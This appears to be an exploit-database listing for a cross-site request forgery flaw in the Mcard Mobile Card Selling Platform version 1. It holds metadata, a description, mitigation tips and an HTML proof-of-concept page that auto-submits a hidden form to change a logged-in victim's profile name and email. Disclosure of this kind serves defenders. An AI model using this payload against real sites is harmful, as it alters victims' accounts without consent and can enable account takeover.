header-logo
Suggest Exploit
vendor:
Mcard Mobile Card Selling Platform
by:
L0RD
3.1
CVSS
LOW
Cross-Site Request Forgery
352
CWE
Product Name: Mcard Mobile Card Selling Platform
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:codecanyon:mcard_mobile_card_selling_platform
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

Mcard – Mobile Card Selling Platform 1 – Cross-Site Request Forgery

Mcard is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious HTML page that when visited by an authenticated user, can cause the user to unknowingly perform actions on the vulnerable website. In this case, an attacker can craft a malicious HTML page that when visited by an authenticated user, can cause the user to unknowingly update their profile information. This can be done by sending a POST request to the vulnerable website with the malicious parameters.

Mitigation:

Implementing CSRF tokens, using same-site cookies, and using HTTPOnly cookies can help mitigate CSRF attacks.
Source

Exploit-DB raw data:

# Exploit Title:  Mcard - Mobile Card Selling Platform 1 - Cross-Site Request Forgery
# Date: 2018-05-23
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/mcard-mobile-card-selling-platform/19307193?s_rank=15
# Version: 1
# Tested on: Kali linux

# POC :

<html>
<head>
   <title>CSRF POC</title>
</head>
<body>
    <form action="http://Target/card/profile" method="POST">
      <input type="hidden" name="fname" value="decode" />
      <input type="hidden" name="lname" value="test" />
      <input type="hidden" name="email" value="lord&#46;decode&#64;gmail&#46;com" />
    </form>
 <script>
   document.forms[0].submit();
 </script>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR